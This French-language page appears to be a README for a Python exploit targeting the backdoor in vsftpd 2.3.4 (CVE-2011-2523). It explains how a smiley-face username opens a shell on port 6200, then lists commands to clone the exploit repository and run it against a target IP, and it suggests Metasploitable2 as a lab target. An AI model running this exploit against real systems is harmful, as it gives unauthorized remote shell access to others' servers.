
Exploit Python pour vsftpd 2.3.4 - Exécution de commande via backdoor
Very Secure FTP Daemon (vsftpd) est un serveur FTP pour les plates-formes de type Unix, y compris Linux. Il est distribué sous les termes de la Licence Publique Générale GNU. Il supporte IPv6 ainsi que SSL.
Il a été révélé en juillet 2011 que la version 2.3.4 de vsftpd, qui pouvait être téléchargée depuis le site principal, avait été compromise. Les utilisateurs se connectant à un serveur vsftpd-2.3.4 piraté peuvent obtenir un shell de commande sur le port 6200 en entrant un visage souriant :) comme nom d'utilisateur. Ce n'était pas une faille de sécurité dans vsftpd ; plutôt, quelqu'un avait téléchargé une version distincte de vsftpd contenant une porte dérobée. Le site a depuis été migré vers Google App Engine.
sudo apt update
sudo apt install python3
sudo apt install python3-pip
pip install argparse
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.py
python3 exploit.py -host Target_IP

Vous pouvez tester l'exploit sur Metasploitable2